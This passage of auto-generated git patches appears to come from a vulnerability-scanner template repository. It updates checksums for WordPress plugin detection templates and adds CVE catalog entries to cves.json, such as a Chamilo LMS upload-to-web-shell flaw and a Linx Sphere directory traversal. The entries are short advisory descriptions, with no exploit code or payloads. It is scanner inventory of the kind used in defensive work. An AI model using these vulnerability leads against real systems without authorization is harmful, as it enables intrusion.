+http/technologies/wordpress/plugins/maintenance.yaml:44bd53f11dedde34fbc81dd58604744f1d183223 +http/technologies/wordpress/plugins/mainwp-child.yaml:fbf0ec1689a90f783c8ceb02f7a04382c39309e5 +http/technologies/wordpress/plugins/malcare-security.yaml:5f2ef05bae54a6a05dba95fac2c45753422d9185 +http/technologies/wordpress/plugins/megamenu.yaml:3a3867b2e7000490acec8a1db0f7765ed9fc8fe1 +http/technologies/wordpress/plugins/members.yaml:ba857dc41e1d31243de30015c4d9470d42df8c53 +http/technologies/wordpress/plugins/meta-box.yaml:8c38bd4306888e54dc3391102d10fa72837e1043 +http/technologies/wordpress/plugins/metform.yaml:90f52dbae57fb96e16c98281f8524d0daf351e9e +http/technologies/wordpress/plugins/ml-slider.yaml:7ed06a67a393d9bf9c1354a894fa26bca17fd4a2 +http/technologies/wordpress/plugins/newsletter.yaml:3ee3c651239599cb45dcf220c7409494c9ebe9c3 +http/technologies/wordpress/plugins/nextend-facebook-connect.yaml:0c33021a4eefb6a660c593071371537361dfb84d +http/technologies/wordpress/plugins/nextgen-gallery.yaml:ea5e79cd98b84b48b69a0145227d4ec435ed5392 +http/technologies/wordpress/plugins/ninja-forms.yaml:eaafa820796d0c404ee59dd9efefab26c58c4624 +http/technologies/wordpress/plugins/ocean-extra.yaml:65228be6752d1dc95c05dd0a4c75209b04a41790 +http/technologies/wordpress/plugins/official-facebook-pixel.yaml:42b1aeba39e9d1062b8b35b5d6fc1c9ac92914f0 +http/technologies/wordpress/plugins/one-click-demo-import.yaml:9b10160492a86d235ec330579fdefa5eb92b1a95 +http/technologies/wordpress/plugins/optinmonster.yaml:cb72b324f850b87de1beac0dce1f120bd5e89a47 +http/technologies/wordpress/plugins/otter-blocks.yaml:1d77ec76194db956e207c4671a626de6fb1b20e7 +http/technologies/wordpress/plugins/password-protected.yaml:691f351480bb6cd23aa7afedf5dcde3862b61154 +http/technologies/wordpress/plugins/pdf-embedder.yaml:93ec0b4ddeff00afbd2b34a4e49371ceb2d4c48d http/technologies/wordpress/plugins/photo-gallery.yaml:37274dfdbd25ec4bcb7a3f79052c88d9df2c023e http/technologies/wordpress/plugins/php-compatibility-checker.yaml:9ae2457c7e9d21bee89ff0283903047bd188b93d -http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:974b88a88765f7a1a8f64ede8e32db580178e0ca -http/technologies/wordpress/plugins/pixelyoursite.yaml:dff9f562335307a4b93a530a975442df92a8428e -http/technologies/wordpress/plugins/polylang.yaml:8a78c4f36849c0b2a029aee3cec3a598cfff7ba8 +http/technologies/wordpress/plugins/pinterest-for-woocommerce.yaml:ea3fc197949183230c36a54ec40ce7cec2ce05cb +http/technologies/wordpress/plugins/pixelyoursite.yaml:b5bbf81e5eb650342b3d4c2fca46310ee8801848 +http/technologies/wordpress/plugins/polylang.yaml:366f25da7da9f9f2f6aa349b25c24d9242b86c1a http/technologies/wordpress/plugins/popup-builder.yaml:468087ab250c0b356f499a501d5a948d709c9a05 -http/technologies/wordpress/plugins/popup-maker.yaml:4fa3385cedabf7add168b6596d0dc79c0ee1a30f -http/technologies/wordpress/plugins/post-smtp.yaml:0f9797f4da021f45de0710c7e1c557026e81bbf2 -http/technologies/wordpress/plugins/post-types-order.yaml:ee09985c7d83e7cc8e2459e450a470b506f1ed10 -http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:1bb17affaf189134c2bfaead1fd37fc59809198f -http/technologies/wordpress/plugins/pretty-link.yaml:2e585abe4c1fc10b57915e250887d5c8e7cabd6e -http/technologies/wordpress/plugins/really-simple-captcha.yaml:253317c6609ff8f784bb453b8529706e0d2c2d3d -http/technologies/wordpress/plugins/really-simple-ssl.yaml:3257aac50801d6df3fa1ced1a324396a3cc86743 -http/technologies/wordpress/plugins/redirection.yaml:83bc9cfb08baf937e486328b30bbfae410b01795 -http/technologies/wordpress/plugins/redux-framework.yaml:3f4a9330ffe914352446f63d828c6409882137cd -http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:f83a5f00172df37eb2a5185f38c8898e3daddd28 -http/technologies/wordpress/plugins/royal-elementor-addons.yaml:2c7c8a757b577539bb1259fe0249919705f39641 -http/technologies/wordpress/plugins/safe-svg.yaml:a49c3a50635e2056153e428a2fc6a4cead28a32b -http/technologies/wordpress/plugins/seo-by-rank-math.yaml:01dcb978dcea997996aa4b29702a0cf3ba7254ce -http/technologies/wordpress/plugins/sg-cachepress.yaml:6bc39e60652d6cda06db95e83e01d21649f254d5 -http/technologies/wordpress/plugins/sg-security.yaml:8054658b173dfb77b988ebff8c940de0ac400b37 -http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:c6eed26f66e6c4072af32d672cd64860c53ae63e -http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:23c88c8ee9e4fdff3280cf6611a35c20ae9216dd -http/technologies/wordpress/plugins/simple-custom-post-order.yaml:abad4f06dbe63a132b80ab0c4440c3ecbc78eb6e -http/technologies/wordpress/plugins/simple-history.yaml:841dce087f50e2987921cd0040c5d6b27e9d3340 +http/technologies/wordpress/plugins/popup-maker.yaml:1c4cfb8a42e30c98281bc9a2f5c966d999c2a7d7 +http/technologies/wordpress/plugins/post-smtp.yaml:5146be93263e512b200ab784727f91612d5117f6 +http/technologies/wordpress/plugins/post-types-order.yaml:3691aaa9f183d9feef18ec4b069b169a96871b81 +http/technologies/wordpress/plugins/premium-addons-for-elementor.yaml:5eac1e84dd2eb1f27121ee409e9e4c6f69ed588c +http/technologies/wordpress/plugins/pretty-link.yaml:9babdd01d2c338a5f22e1e684a3d2a6b82424668 +http/technologies/wordpress/plugins/really-simple-captcha.yaml:f76181edda9b3d62e3ea21bd51a4d5e4c450bef6 +http/technologies/wordpress/plugins/really-simple-ssl.yaml:bb7296600fad043c5a5fa3ea8c4d3de597e133bc +http/technologies/wordpress/plugins/redirection.yaml:f2fc65063eeb5b4f425e53c33e752b0acc46e8f1 +http/technologies/wordpress/plugins/redux-framework.yaml:af9b75a984712e6609f6bd94f956e026b9dc307b +http/technologies/wordpress/plugins/regenerate-thumbnails.yaml:c0fa1d1aece59d5d6e8e708f4b2d49e769998dd9 +http/technologies/wordpress/plugins/royal-elementor-addons.yaml:81ee3491d2caa18b8f476cbc4f8bdf6645f98857 +http/technologies/wordpress/plugins/safe-svg.yaml:7593c611e1da50fc587d7a34a6447f494d5cddb8 +http/technologies/wordpress/plugins/seo-by-rank-math.yaml:91918b715b41c561ccd6da01b15c5710ceefd48d +http/technologies/wordpress/plugins/sg-cachepress.yaml:86a47e535c821c5c1af37c73687729982a7e8256 +http/technologies/wordpress/plugins/sg-security.yaml:e833734b1006bc06ee6c86a825b3902ec67fb113 +http/technologies/wordpress/plugins/shortcodes-ultimate.yaml:55d132c332394a78efb0b3130261bf37cc0612d2 +http/technologies/wordpress/plugins/shortpixel-image-optimiser.yaml:196c39da6c914816c14f11df5fc9106d9439f200 +http/technologies/wordpress/plugins/simple-custom-post-order.yaml:f7959e70ca5912ffccbe8bfb5aaf69f15dea94ad +http/technologies/wordpress/plugins/simple-history.yaml:2159d42f27309f1f6a116a76e883b46ef1087ce9 http/technologies/wordpress/plugins/simple-page-ordering.yaml:7d96ac56d7ed2ed031b6789429888ef703d39538 -http/technologies/wordpress/plugins/siteguard.yaml:1213ff348ec456d53dd649a5bea24c90934822ac -http/technologies/wordpress/plugins/siteorigin-panels.yaml:cc0a76850b8bdc64d3285ceb97646221d5d51049 -http/technologies/wordpress/plugins/smart-slider-3.yaml:96eb9799d770ef5d30512e66c3440bcd120a7090 -http/technologies/wordpress/plugins/so-widgets-bundle.yaml:2ec9633ca5100cecd5182105c82e3497c212da08 +http/technologies/wordpress/plugins/siteguard.yaml:1603622bb764bbd891fa245b1fb0851d8443eec0 +http/technologies/wordpress/plugins/siteorigin-panels.yaml:bdd37fdd569c13441fb87d5a310a8beca53ecead +http/technologies/wordpress/plugins/smart-slider-3.yaml:6669412fae6e1f830d8132df4b3ad7036fa95746 +http/technologies/wordpress/plugins/so-widgets-bundle.yaml:9e123d8b5122703a197a8279f6b6612af707aa1f http/technologies/wordpress/plugins/ssl-insecure-content-fixer.yaml:aab70fa0f4b1c898371aa4af959db60e6cc733dd -http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:de7c3bfde45638ef5a619f0a9884f13b0e99c8f9 -http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:d6810436217b53d0982cdc39fff36eeed64a8423 -http/technologies/wordpress/plugins/sucuri-scanner.yaml:b18d89e4655ae1c25d78acfd2a0820c23dd1c536 -http/technologies/wordpress/plugins/svg-support.yaml:0c5d5a30e9991dc5262ca553b76189449aefe7b7 -http/technologies/wordpress/plugins/table-of-contents-plus.yaml:5e717a7d63b8808e0161622e735bd4d933be6f4f -http/technologies/wordpress/plugins/tablepress.yaml:70a1b6fe5b80b311fd26aaa4ff4e2c1f6ff7a6c0 -http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:4fd03e0372203e0f4d455ee83d9878e11a6e7205 -http/technologies/wordpress/plugins/templately.yaml:eed9c843f65424989ef953c84ef2942efc3722ca -http/technologies/wordpress/plugins/the-events-calendar.yaml:b507a2b35453a26d8068d49c9f4dba574899f83d +http/technologies/wordpress/plugins/sticky-header-effects-for-elementor.yaml:218b764f5e7ec74be15c072c6dcef4976de6d79b +http/technologies/wordpress/plugins/stops-core-theme-and-plugin-updates.yaml:48e485435630e99bcc197171a946575b47361c73 +http/technologies/wordpress/plugins/sucuri-scanner.yaml:73a5d57f8a22ede9c4de7d3fba4f1aeaa4c4bb2e +http/technologies/wordpress/plugins/svg-support.yaml:9e209af3c91abf6ba27d6d2b49ddf7196dc91450 +http/technologies/wordpress/plugins/table-of-contents-plus.yaml:e9ca166f376b599e787a66db6114262e2a888811 +http/technologies/wordpress/plugins/tablepress.yaml:1907c25a373a78ea4c81d21eae209acb12104a9b +http/technologies/wordpress/plugins/taxonomy-terms-order.yaml:a8ac16c00a1fe225e48ebe24c94aba1323e1e584 +http/technologies/wordpress/plugins/templately.yaml:85704028e9e8d3e3a3ca74af306a32d502c4388d +http/technologies/wordpress/plugins/the-events-calendar.yaml:52c6ff41c4bd34154268728639cfa0e3b4f8d8ab http/technologies/wordpress/plugins/themeisle-companion.yaml:c706aef04e5b9ce414f460819eca30bb3bcb00e5 -http/technologies/wordpress/plugins/tinymce-advanced.yaml:352ce17c3530648f0c8f4e9c154c23511c8514e3 -http/technologies/wordpress/plugins/translatepress-multilingual.yaml:f8f822418ea63a3156f3a12f92427f5ff08e619b -http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:66f97aa22fc7dab7899d946771586f119d026099 -http/technologies/wordpress/plugins/under-construction-page.yaml:c7123c39b1f28e3b5c05e7e90452a69a12289785 +http/technologies/wordpress/plugins/tinymce-advanced.yaml:9e6bb4ae3c2a1718e019e5374810c6b9e64fa3f5 +http/technologies/wordpress/plugins/translatepress-multilingual.yaml:97b7e9a9b4b15aff49cca7d5e725392e7bf627fd +http/technologies/wordpress/plugins/ultimate-addons-for-gutenberg.yaml:9c37c0d9262b2938015364f494651b05b0fa6033 +http/technologies/wordpress/plugins/under-construction-page.yaml:c76e58a7cf7365aaaa3685531874f5d2ea3d1b68 http/technologies/wordpress/plugins/unyson.yaml:e01d9f525f3cf577ab43441c694230c07608611e -http/technologies/wordpress/plugins/updraftplus.yaml:916e18c4c940f310d7f41fee57688741cdcf47a6 +http/technologies/wordpress/plugins/updraftplus.yaml:5050d66d21b2380882e67332a769bc7da06154e6 http/technologies/wordpress/plugins/use-any-font.yaml:e1c358a86017c4c3f5abe62d76da6878d61f5d47 -http/technologies/wordpress/plugins/user-role-editor.yaml:3539198758804fde75775c11f43e81ebeff72955 +http/technologies/wordpress/plugins/user-role-editor.yaml:65b055fb6332b2169a9e7143591f116c146e06a8 http/technologies/wordpress/plugins/velvet-blues-update-urls.yaml:1a6d9e7560dba5c9471c20cffdf0ba1b098fbb7c -http/technologies/wordpress/plugins/w3-total-cache.yaml:52f17fba29e7b8dc93eaa069298fb7c3d65d3d14 -http/technologies/wordpress/plugins/webp-converter-for-media.yaml:3d4575faefc127bd612072cf6d4180c8fce5e383 -http/technologies/wordpress/plugins/webp-express.yaml:44ef44ab9f8e30c05805c113da7bb21df83e06dc -http/technologies/wordpress/plugins/widget-importer-exporter.yaml:515bcd87d0c3529a1678d173340661ca1f1a4979 -http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:f204753bfe78a04f80044bae283d9ca8e6b8abf8 -http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:7de1cee7a6d20bf8e18e090d0ec2a7e9fd112146 -http/technologies/wordpress/plugins/woo-variation-swatches.yaml:bc72ae051588e4d6095f1e456c9db387ca1eb327 +http/technologies/wordpress/plugins/w3-total-cache.yaml:e6d76a664a5009598ce3e2d6f3b412667c9cacef +http/technologies/wordpress/plugins/webp-converter-for-media.yaml:305690e415de547348ac36cf0d9544b347b16a38 +http/technologies/wordpress/plugins/webp-express.yaml:fcb956491146843be9f3b5f152965cc0796f75e8 +http/technologies/wordpress/plugins/widget-importer-exporter.yaml:ffa48fc0f80ceb41dff2b5c69116837b0111e074 +http/technologies/wordpress/plugins/woo-cart-abandonment-recovery.yaml:6db1302965c217cd38e160295fd9d7defa47afa9 +http/technologies/wordpress/plugins/woo-checkout-field-editor-pro.yaml:c2b6a592df83eb0b6abbfa988893633cb948b997 +http/technologies/wordpress/plugins/woo-variation-swatches.yaml:68f2dd5d2776de335efc273ddf2249b507527398 http/technologies/wordpress/plugins/woocommerce-gateway-paypal-express-checkout.yaml:4f2c82ad5cf98659804bd115d05bf9db8461e200 -http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:294c7434abee8899fcf7907b347dd8da78c6da63 -http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:aa2012c7b220df9304c5e7136f0a65151b05e799 -http/technologies/wordpress/plugins/woocommerce-payments.yaml:6cbd2c37290c72dd168f5ecf2e1809cef400492f -http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:5d2df892fb2ac54cfde6df099f5c02ad00bcdae3 -http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:bcb05ad7ca6a68175730f60dc541b2e681215521 -http/technologies/wordpress/plugins/woocommerce-services.yaml:d6c77cbedfe424f47227bd0c19412866ebd925cf -http/technologies/wordpress/plugins/woocommerce.yaml:666e01577b8f949e9bb77d0c80a9559ac1276f7a -http/technologies/wordpress/plugins/wordfence.yaml:91c28e9577ab467b6a3e5f0c8ebb743a408e7049 -http/technologies/wordpress/plugins/wordpress-importer.yaml:33fa033d6c9faa3ac97c940148e3175388a50621 -http/technologies/wordpress/plugins/wordpress-seo.yaml:d847216a5097fa6f600ef6d0e7889803b8986bb8 +http/technologies/wordpress/plugins/woocommerce-gateway-stripe.yaml:9929d037d9f1459cff16926d024bcf666c50edda +http/technologies/wordpress/plugins/woocommerce-legacy-rest-api.yaml:e7b3acf574cd1dc2b9d4f7a6240769a83a938856 +http/technologies/wordpress/plugins/woocommerce-payments.yaml:60a3ada3d5bd510f77eb3a77c32d88ad20e997bc +http/technologies/wordpress/plugins/woocommerce-paypal-payments.yaml:b2a01f711495d5a37d201b510a6487ae816dab9b +http/technologies/wordpress/plugins/woocommerce-pdf-invoices-packing-slips.yaml:d3b1a70c5b241c5776101bdf5fb0ee9753725d4b +http/technologies/wordpress/plugins/woocommerce-services.yaml:6f9a1c3b761936c259c9e29ee32d28f691ae8b77 +http/technologies/wordpress/plugins/woocommerce.yaml:8231905d6d899f1da3fe5641cb3908eac4c1113f +http/technologies/wordpress/plugins/wordfence.yaml:43d1eb1e1e314aa16d9c1d5d0d5d4c59de91ac1b +http/technologies/wordpress/plugins/wordpress-importer.yaml:c7ba561f2a03d75e5f929c367ecdce158d4e456f +http/technologies/wordpress/plugins/wordpress-seo.yaml:a9de56a1598eaa8ab15ab968f734d71fdf2bc107 http/technologies/wordpress/plugins/wordpress-woosidebars.yaml:679cd62c97446d90fc7fbb50f64403cb10c4c319 -http/technologies/wordpress/plugins/worker.yaml:b67c1aaa00a8f9bb1b14e5669b686e4bb0d9544b -http/technologies/wordpress/plugins/wp-fastest-cache.yaml:f32a9b560458276e9bdded8767c3d648040c2088 -http/technologies/wordpress/plugins/wp-file-manager.yaml:2d0dfda02d741eafa94293ee3acc1f29a899bb7c -http/technologies/wordpress/plugins/wp-google-maps.yaml:400e2f66a1cc853dc214783b259fd6cf8915764f -http/technologies/wordpress/plugins/wp-mail-smtp.yaml:8ef216b1cb8322ee974033351a6bd6822a5c54ae -http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:1b04964ce7c9d28fca99c646706322a3fbc07046 -http/technologies/wordpress/plugins/wp-migrate-db.yaml:87cf5360bc373ded6ba5e6d63bc6c2233658444b -http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:264f60522dd91e6beb72a5ff087145144d9dbcec -http/technologies/wordpress/plugins/wp-optimize.yaml:63ec01f92e69db4120dfa53954673d77ce08d677 -http/technologies/wordpress/plugins/wp-pagenavi.yaml:5416c2bbbcbedd6ceb1bf25307a3736548c180d5 -http/technologies/wordpress/plugins/wp-reset.yaml:2e6c66afb9d3fc4bff9aa1ad5d291db99d4432ac -http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:5c92045038d77527bd77c5b8e1fceaaec61f0aa5 -http/technologies/wordpress/plugins/wp-rollback.yaml:359caa5ba74eda80215445401911e553271074c6 -http/technologies/wordpress/plugins/wp-seopress.yaml:0973617dc3ff63341016addeeda6cb61ecd529e3 -http/technologies/wordpress/plugins/wp-sitemap-page.yaml:74a96d30e68e41ebcddf7800a3101fe00e91dc00 -http/technologies/wordpress/plugins/wp-smushit.yaml:18153a5981abd160d9f7e49fa1a9b265985d8d91 -http/technologies/wordpress/plugins/wp-statistics.yaml:3dd770a375e986ef8fbc71190c9cb80a8262fc35 -http/technologies/wordpress/plugins/wp-super-cache.yaml:7c42ff5457c3ae6168dbf61a451127ccafceaa9d +http/technologies/wordpress/plugins/worker.yaml:eec5a16391040875785d932499c9f260e8efeb8c +http/technologies/wordpress/plugins/wp-fastest-cache.yaml:3bac8419d21ce83693d583293fb12b438a544402 +http/technologies/wordpress/plugins/wp-file-manager.yaml:227e50238a78872a0caf5ac0c54ab4d4fa33be67 +http/technologies/wordpress/plugins/wp-google-maps.yaml:f398fe5460d8180c0e85568b79baa92355130348 +http/technologies/wordpress/plugins/wp-mail-smtp.yaml:3c08f95f3bce5c44e7c5ebda373c397d0ddb8342 +http/technologies/wordpress/plugins/wp-maintenance-mode.yaml:d7bb63c19f2338fd77cfa210fc4fa2e2c8bbff85 +http/technologies/wordpress/plugins/wp-migrate-db.yaml:996eb41fddbc34f6078ebecc34cececbb6eec504 +http/technologies/wordpress/plugins/wp-multibyte-patch.yaml:252c64b3711943bbfd6d507669f1175f2225cbb2 +http/technologies/wordpress/plugins/wp-optimize.yaml:7d8bae34481b9723031a3574ce49620e76ad88ec +http/technologies/wordpress/plugins/wp-pagenavi.yaml:2a1f36db756a5f86740144301429285d3c50fee9 +http/technologies/wordpress/plugins/wp-reset.yaml:28019b1d96d3d4c456ac774c3e5cdeb666b06859 +http/technologies/wordpress/plugins/wp-reviews-plugin-for-google.yaml:6100c61e48b0e15a0971d15714bdefa28c1fedcc +http/technologies/wordpress/plugins/wp-rollback.yaml:f7b2f501eb11a44d43b23d3933c06fe15927b2ca +http/technologies/wordpress/plugins/wp-seopress.yaml:1f1aa346cc5d9b8f6c766a4d6388dc8f90e34030 +http/technologies/wordpress/plugins/wp-sitemap-page.yaml:a4e9a4bb7976f9cab3829e15f7cf6a476a2e3792 +http/technologies/wordpress/plugins/wp-smushit.yaml:cff5012e05d9eca8dae054e4d73667340c631ddb +http/technologies/wordpress/plugins/wp-statistics.yaml:db2b26951dec4a78053fac69af816940d49cda0b +http/technologies/wordpress/plugins/wp-super-cache.yaml:312d5ce63e6b319b2688eb416664e575699fe649 http/technologies/wordpress/plugins/wp-user-avatar.yaml:a8aa0e902ead01de33b23343603d18b63829517e -http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:fa1f9d043a9ed24d60ff179ad7c53d8a62b5d080 -http/technologies/wordpress/plugins/wpcf7-redirect.yaml:f7c444844389673b9ee38cae71bb287bc13c2177 -http/technologies/wordpress/plugins/wpforms-lite.yaml:18d3a2306187baca443d85f964fd88a5c6279571 -http/technologies/wordpress/plugins/wps-hide-login.yaml:8983308eda9ff079ecc6dd650ccce1a75589c66a -http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:12ad0ab316fabb50b81984d70a5ec919b057b1c3 +http/technologies/wordpress/plugins/wpcf7-recaptcha.yaml:a9acaa8bc79b55109355d8894c249b6e99fba870 +http/technologies/wordpress/plugins/wpcf7-redirect.yaml:da8bff7c82756e3e1ac6810a8eb2ef194d109a43 +http/technologies/wordpress/plugins/wpforms-lite.yaml:cf27de8a9131c5a7427c0f9d3f4bfd5f378e26eb +http/technologies/wordpress/plugins/wps-hide-login.yaml:faf97e5fb87bd43caaa123bb77e5cb64d218f00d +http/technologies/wordpress/plugins/wpvivid-backuprestore.yaml:f03291859093b6ab5196a683c017e300566beb9d http/technologies/wordpress/plugins/yith-woocommerce-compare.yaml:caf39ccc6507df09c0816caa7af29404c193d9a5 -http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:5e465c8d86b72daa14c25e2cc1557f47bd49f1f3 +http/technologies/wordpress/plugins/yith-woocommerce-wishlist.yaml:c3474b242e88f3dd31b5317051e69194f36317f9 http/technologies/wordpress/themes/wp-bricks-builder-theme.yaml:0b85e26615c692bab9ceb5ae74dc9adec4097b9e http/technologies/wordpress-detect.yaml:a0148caf9d3f957171e7b75d4382dc7d54e454e5 http/technologies/workerman-websocket-detect.yaml:1396bc8234c4f538d5f57966b6b8084fe68f574f @@ -8873,7 +8874,7 @@ ssl/tls-version.yaml:4e40f08efbb39172b9280ea9e26ca5f0a14a575a ssl/untrusted-root-certificate.yaml:a91d36990a1d052f5ee64d170ad8f084d38dab19 ssl/weak-cipher-suites.yaml:62fe808d9dfafda67c410e6cb9445fdc70257e89 ssl/wildcard-tls.yaml:d244f62c7bd22d3868fc6fc7cb9550af6b261210 -templates-checksum.txt:3e7c8b0e0bf0eab7c9d437bb65f9088a97313ed3 +templates-checksum.txt:c8932cc37db88668f0222cf912925722240b4934 wappalyzer-mapping.yml:7f03bd65baacac20c1dc6bbf35ff2407959574f1 workflows/74cms-workflow.yaml:bb010e767ad32b906153e36ea618be545b4e22d0 workflows/acrolinx-workflow.yaml:8434089bb55dec3d7b2ebc6a6f340e73382dd0c4 From 40e3d19a8157ba09c2bb61e23aaf739edd23d398 Mon Sep 17 00:00:00 2001 From: "[PDBot]" Date: Mon, 15 Jul 2024 04:44:14 +0000 Subject: [PATCH 147/247] Auto Generated New Template Addition List [Mon Jul 15 04:44:13 UTC 2024] :robot: From 3e992cf88e45c22117a349e6a381832c545542ce Mon Sep 17 00:00:00 2001 From: GitHub Action Date: Mon, 15 Jul 2024 04:44:18 +0000 Subject: [PATCH 148/247] Auto Generated cves.json [Mon Jul 15 04:44:18 UTC 2024] :robot: --- cves.json | 7 +++++++ cves.json-checksum.txt | 2 +- 2 files changed, 8 insertions(+), 1 deletion(-) diff --git a/cves.json b/cves.json index fc27b33e55a..48b0e65d86c 100644 --- a/cves.json +++ b/cves.json @@ -1941,6 +1941,7 @@ {"ID":"CVE-2022-44957","Info":{"Name":"WebTareas 2.4p5 - Cross-Site Scripting","Severity":"medium","Description":"webtareas 2.4p5 was discovered to contain a cross-site scripting (XSS) vulnerability in the component /clients/listclients.php. This vulnerability allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-44957.yaml"} {"ID":"CVE-2022-45037","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/users/index.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Display Name field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45037.yaml"} {"ID":"CVE-2022-45038","Info":{"Name":"WBCE CMS v1.5.4 - Cross Site Scripting (Stored)","Severity":"medium","Description":"A cross-site scripting (XSS) vulnerability in /admin/settings/save.php of WBCE CMS v1.5.4 allows attackers to execute arbitrary web scripts or HTML via a crafted payload injected into the Website Footer field.\n","Classification":{"CVSSScore":"5.4"}},"file_path":"http/cves/2022/CVE-2022-45038.yaml"} +{"ID":"CVE-2022-45269","Info":{"Name":"Linx Sphere - Directory Traversal","Severity":"high","Description":"A directory traversal vulnerability in the component SCS.Web.Server.SPI/1.0 of Linx Sphere LINX 7.35.ST15 allows attackers to read arbitrary files.\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-45269.yaml"} {"ID":"CVE-2022-45354","Info":{"Name":"Download Monitor \u003c= 4.7.60 - Sensitive Information Exposure","Severity":"high","Description":"The Download Monitor plugin for WordPress is vulnerable to Sensitive Information Exposure in versions up to, and including, 4.7.60 via REST API. This can allow unauthenticated attackers to extract sensitive data including user reports, download reports, and user data including email, role, id and other info (not passwords)\n","Classification":{"CVSSScore":"7.5"}},"file_path":"http/cves/2022/CVE-2022-45354.yaml"} {"ID":"CVE-2022-45362","Info":{"Name":"WordPress Paytm Payment Gateway \u003c=2.7.0 - Server-Side Request Forgery","Severity":"medium","Description":"WordPress Paytm Payment Gateway plugin through 2.7.0 contains a server-side request forgery vulnerability. An attacker can cause a website to execute website requests to an arbitrary domain, thereby making it possible to obtain sensitive information, modify data, and/or execute unauthorized administrative operations in the context of the affected site.","Classification":{"CVSSScore":"6.5"}},"file_path":"http/cves/2022/CVE-2022-45362.yaml"} {"ID":"CVE-2022-45365","Info":{"Name":"Stock Ticker \u003c= 3.23.2 - Cross-Site-Scripting","Severity":"medium","Description":"The Stock Ticker plugin for WordPress is vulnerable to Reflected Cross-Site Scripting in the ajax_stockticker_symbol_search_test function in versions up to, and including, 3.23.2 due to insufficient input sanitization and output escaping. This makes it possible for unauthenticated attackers to inject arbitrary web scripts in pages that execute if they can successfully trick a user into performing an action such as clicking on a link.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2022/CVE-2022-45365.yaml"} @@ -2261,6 +2262,7 @@ {"ID":"CVE-2023-4174","Info":{"Name":"mooSocial 3.1.6 - Reflected Cross Site Scripting","Severity":"medium","Description":"A vulnerability has been found in mooSocial mooStore 3.1.6 and classified as problematic. Affected by this vulnerability is an unknown functionality. The manipulation leads to cross site scripting. The attack can be launched remotely.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4174.yaml"} {"ID":"CVE-2023-41763","Info":{"Name":"Skype for Business 2019 (SfB) - Blind Server-side Request Forgery","Severity":"medium","Description":"Skype Pre-Auth Server-side Request Forgery (SSRF) vulnerability\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-41763.yaml"} {"ID":"CVE-2023-41892","Info":{"Name":"CraftCMS \u003c 4.4.15 - Unauthenticated Remote Code Execution","Severity":"critical","Description":"Craft CMS is a platform for creating digital experiences. This is a high-impact, low-complexity attack vector leading to Remote Code Execution (RCE). Users running Craft installations before 4.4.15 are encouraged to update to at least that version to mitigate the issue. This issue has been fixed in Craft CMS 4.4.15.","Classification":{"CVSSScore":"9.8"}},"file_path":"http/cves/2023/CVE-2023-41892.yaml"} +{"ID":"CVE-2023-4220","Info":{"Name":"Chamilo LMS \u003c= 1.11.24 - Remote Code Execution","Severity":"medium","Description":"Unrestricted file upload in big file upload functionality in `/main/inc/lib/javascript/bigupload/inc/bigUpload.php` in Chamilo LMS \u003c= v1.11.24 allows unauthenticated attackers to perform stored cross-site scripting attacks and obtain remote code execution via uploading of web shell.\n","Classification":{"CVSSScore":"6.1"}},"file_path":"http/cves/2023/CVE-2023-4220.yaml"} {"ID":"CVE-2023-42343","Info":{"Name":"OpenCMS - Cross-Site Scripting","Severity":"medium","Description":"OpenCMS below 10.5.1 is vulnerable to Cross-Site Scripting vulnerability.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42343.yaml"} {"ID":"CVE-2023-42344","Info":{"Name":"OpenCMS - XML external entity (XXE)","Severity":"high","Description":"users can execute code without authentication. An attacker can execute malicious requests on the OpenCms server. When the requests are successful vulnerable OpenCms can be exploited resulting in an unauthenticated XXE vulnerability. Based on research OpenCMS versions from 9.0.0 to 10.5.0 are vulnerable.\n","Classification":{"CVSSScore":"N/A"}},"file_path":"http/cves/2023/CVE-2023-42344.yaml"} {"ID":"CVE-2023-42442","Info":{"Name":"JumpServer \u003e 3.6.4 - Information Disclosure","Severity":"medium","Description":"JumpServer is an open source bastion host and a professional operation and maintenance security audit system. Starting in version 3.0.0 and prior to versions 3.5.5 and 3.6.4, session replays can download without authentication. Session replays stored in S3, OSS, or other cloud storage are not affected. The api `/api/v1/terminal/sessions/` permission control is broken and can be accessed anonymously. SessionViewSet permission classes set to `[RBACPermission | IsSessionAssignee]`, relation is or, so any permission matched will be allowed. Versions 3.5.5 and 3.6.4 have a fix. After upgrading, visit the api `$HOST/api/v1/terminal/sessions/?limit=1`. The expected http response code is 401 (`not_authenticated`).\n","Classification":{"CVSSScore":"5.3"}},"file_path":"http/cves/2023/CVE-2023-42442.yaml"} @@ -2274,6 +2276,7 @@ {"ID":"CVE-2023-43374","Info":{"Name":"Hoteldruid v3.0.5 - SQL 